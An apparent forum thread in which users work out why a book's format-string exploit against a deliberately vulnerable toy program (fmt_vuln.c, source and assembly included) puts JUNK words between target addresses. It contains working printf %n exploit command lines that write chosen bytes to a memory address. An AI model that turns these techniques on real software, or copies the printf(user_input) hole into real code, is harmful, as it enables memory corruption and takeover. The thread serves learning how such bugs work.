-
format string : Question
I found a format string tutorial in a book. I understand the basic concept, but have a question about one of the examples. The aim is to write the value 0xddccbbaa into a static int variable declared in a program, fmt_vuln. The book says that you first write 0xaa like this:
./fmt_vuln `printf "\x70\x97\x04\x08"`%x.%x.%153x%n
which works. Then it says that in order to write 0xbb we need to increase the byte count up to 187, which is 0xbb in decimal. This argument could be anything; it just has to be four bytes long and must be located after the first arbitrary memory address of 0x08049770. The word "JUNK" is four bytes and is fine. The same goes for writing 0xcc and 0xdd.
So according to the book, the entire write procedure would be:
./fmt_vuln `printf "\x70\x97\x04\x08JUNK\x71\x97\x04\x08JUNK\x72\x97\x04\x08JUNK\x73\x97\x04\x08"`%x.%x.%129x%n%17x%n%17x%n%17x%n
My question is: why do we need the four bytes of JUNK separating the addresses, even though we can control the number of bytes by using the width of %x, as in %129x?
Thanks
-
Wild guess: Required memory space padding. This isn't an uncommon practice. If you ping certain OSes and look at a packet capture, you'll see they pad the packets with "junk" like 1234567890....
--Th13
-
Now here's a first :
I haven't a clue as to how to respond ............... yet the answer from TH13 made perfect sense :)
is this a sign of advancement into geekhood ?
or is it just advancing old age :D
[edit]
the greens are from me for the confusion ........:)
-
I thought about the padding, but the problem with that is that each of the writes (0xaa, 0xbb,...) is two hex digits, which is equal to one byte. Now each memory address can hold one byte. So where is the padding (that too, 4 bytes) required?? :confused:
This is confusing, Help!!
-
This is a very interesting analysis of format string bugs. I've been looking over it most of the afternoon and decided to share. Even if you can't use it it's got a lot of good information.
Analysis of Format String Bugs (PDF)
-
I am pretty sure that TheHorse is correct in his assumption that these are used for padding. You are attempting to write an address into some variable and it is necessary to make sure the bytes are properly aligned in memory. This is similar to how the return address in a buffer overflow has to be properly aligned to fit into the correct memory location. If things are not properly aligned (padded), then the wrong address would get written.
-
Modern processors actually take longer to read just one byte than to read 4. IIRC it's because of the way the address bus accesses memory. So it could be some compiler optimization: you store just one byte but the compiler turns it into 4 (the actual byte plus 3 bytes of padding). That could improve the speed of the program (a size-speed trade-off).
One way to find out, though, is to run your program (including the 'exploit') under a debugger. That will give you a chance to look at what the stack actually looks like when it gets 'hit'.
-
SirDice is right, most processors read blocks of 4 bytes or more (normally whatever the word size is, although it varies slightly), so optimization is probably a good guess. Is it possible to contact the author for comment?
-
But the compiler doesn't see the format string. The format string is passed as a parameter to an already compiled (exploitable) program, usually taking advantage of printf(string) instead of printf("%s", string). So the compiler itself never sees the format string. I am almost 100% sure that this is to ensure that the data being entered (the address to be stored) lines up correctly in memory (dealing with word size).
-
Padding seems most obvious but HOW does it need padding? As I wrote earlier each of the writes (0xaa, 0xbb,...) is two hex digits, which is equal to one byte. Now each memory address can hold one byte. So where is the padding (that too, 4 bytes) required??
The processor does read 4 bytes (1 word) but that would mean that it reads all the four consecutive memory addresses. There is no need for the junk, which in any case would add to one byte in the address to make 5 bytes not 4.
Hopefully we can sort this out :/
-
I had refrained from responding since I wasn't sure, but since we are in the guessing stage :)
Is there any way you can post the ASM source? Could there be other things pushed on the stack or heap that you need to make sure are properly accounted for?
-
Here's the source for fmt_vuln.c
-----------------------------------------
#include <stdio.h>   /* printf */
#include <stdlib.h>  /* exit */
#include <string.h>  /* strcpy */
int main(int argc, char *argv[])
{
char text[1024];
static int test_val = -72;
if(argc < 2)
{
printf("Usage: %s <text to print>\n", argv[0]);
exit(0);
}
strcpy(text, argv[1]);
printf("The right way:\n");
// The right way to print user-controlled input:
printf("%s", text);
// ---------------------------------------------
printf("\nThe wrong way:\n");
// The wrong way to print user-controlled input:
printf(text);
// ---------------------------------------------
printf("\n");
// Debug output
printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);
exit(0);
}
-
Kind of off the point, but wouldn't:
char text[1024]; .. strcpy(text, argv[1]);
Be ripe for a little buffer overflow action ?
Anyway, I don't have a Windows compiler so I can't convert this to ASM as needed. But looking at the C, if I had to make an educated guess, I would say the reason for the junk is that the exploit is trying to overwrite a specific portion of the program with your own addresses, and the junk is necessary to make everything come out right on the stack. It's really hard to say without seeing it, though. I recommend you download OllyDbg or IDA, compile the program, load the EXE there and set a breakpoint at the function call; then you can watch it in action.
-
nebulus, I'm using Gentoo Linux, not Windows (Why did you assume that :D )
I have already tried viewing stuff using gdb but couldn't get anything. Perhaps it's because when I installed Gentoo I put compiler optimizations, including -fomit-frame-pointer, in the make.conf file. Can I disable this when compiling a single file, and if so, how?
Here's the ASM created by gcc without the gdb (-g) option:
.file "fmt_vuln.c"
.data
.align 4
.type test_val.0, @object
.size test_val.0, 4
test_val.0:
.long -72
.section .rodata
.LC0:
.string "Usage: %s <text to print>\n"
.LC1:
.string "The right way:\n"
.LC2:
.string "%s"
.LC3:
.string "\nThe wrong way:\n"
.LC4:
.string "\n"
.align 4
.LC5:
.string "[*] test_val @ 0x%08x = %d 0x%08x\n"
.text
.globl main
.type main, @function
main:
pushl %ebp
movl %esp, %ebp
subl $1032, %esp
andl $-16, %esp
movl $0, %eax
addl $15, %eax
addl $15, %eax
shrl $4, %eax
sall $4, %eax
subl %eax, %esp
cmpl $1, 8(%ebp)
jg .L2
subl $8, %esp
movl 12(%ebp), %eax
pushl (%eax)
pushl $.LC0
call printf
addl $16, %esp
subl $12, %esp
pushl $0
call exit
.L2:
subl $8, %esp
movl 12(%ebp), %eax
addl $4, %eax
pushl (%eax)
leal -1032(%ebp), %eax
pushl %eax
call strcpy
addl $16, %esp
subl $12, %esp
pushl $.LC1
call printf
addl $16, %esp
subl $8, %esp
leal -1032(%ebp), %eax
pushl %eax
pushl $.LC2
call printf
addl $16, %esp
subl $12, %esp
pushl $.LC3
call printf
addl $16, %esp
subl $12, %esp
leal -1032(%ebp), %eax
pushl %eax
call printf
addl $16, %esp
subl $12, %esp
pushl $.LC4
call printf
addl $16, %esp
pushl test_val.0
pushl test_val.0
pushl $test_val.0
pushl $.LC5
call printf
addl $16, %esp
subl $12, %esp
pushl $0
call exit
.size main, .-main
.section .note.GNU-stack,"",@progbits
.ident "GCC: (GNU) 3.4.2 20041017 (Red Hat 3.4.2-6.fc3)"
-
Ah, some progress!! This is very interesting:
The following 2 commands do the same thing, i.e. write 0x0000bbaa to the memory address.
./fmt_vuln `printf "\x70\x97\x04\x08JUNK\x71\x97\x04\x08"`%x%x%142x%n%17x%n
./fmt_vuln `printf "\x70\x97\x04\x08\x71\x97\x04\x08"`%x%x%146x%n12345678912345678%n
So 146 in the second makes sense as compared to 142 in the first because the second does not have 4 bytes of JUNK.
In the first, we have %17x after the first %n because (0xbb - 0xaa) is 17. In the second we achieve the same thing with 12345678912345678, which is 17 bytes.
Now the confusing part is that the following command does not work (segmentation fault) even though it seems it should, looking at the above two commands:
./fmt_vuln `printf "\x70\x97\x04\x08\x71\x97\x04\x08"`%x%x%146x%n%17x%n
This command should do the same thing as the one with 12345678912345678 right!!
-
Not exactly. Using %x doesn't let you control the bytes themselves; it lets you control the number of bytes output, by converting to hex and padding the parameter that's popped from the format function's stack (it will always read sizeof(int), usually 4 bytes, from the stack). Don't forget that each time you use %x you move the format function's stack pointer and walk one step further along the stack. So it performs two functions: it lets you manipulate the number of bytes output by printf (which is what %n writes), but it is also how you move (or 'dig up') through the stack to ensure your address is the one being pointed at when the %n writes.
The JUNK may be there just so you can pop it off and add 17 to the output counter. Try either: without the JUNK or the %17x's (just use 17 filler characters like above), or: with the pops (%17x's) and the JUNKs added after the addresses. Let me know how it works out, I'm curious.
-Maestr0
-
OH! So %17x steps through memory only once (4 bytes) and just pads the output to 17 characters. I knew that %x steps through memory by 4 bytes, so it had seemed obvious to me that %17x would step by 17*4 = 68 bytes!!
Both of the variants you suggested (below) do work, as I said in my last post. And now we know why. :D
./fmt_vuln `printf "\x70\x97\x04\x08JUNK\x71\x97\x04\x08"`%x%x%142x%n%17x%n
./fmt_vuln `printf "\x70\x97\x04\x08\x71\x97\x04\x08"`%x%x%146x%n12345678912345678%n
And now we know why the following doesn't work: the %17x consumes the 2nd address as its own argument, so the second %n overshoots it and writes through whatever word comes next. :D
./fmt_vuln `printf "\x70\x97\x04\x08\x71\x97\x04\x08"`%x%x%146x%n%17x%n
Maestr0 has saved the day. Actually more than a day!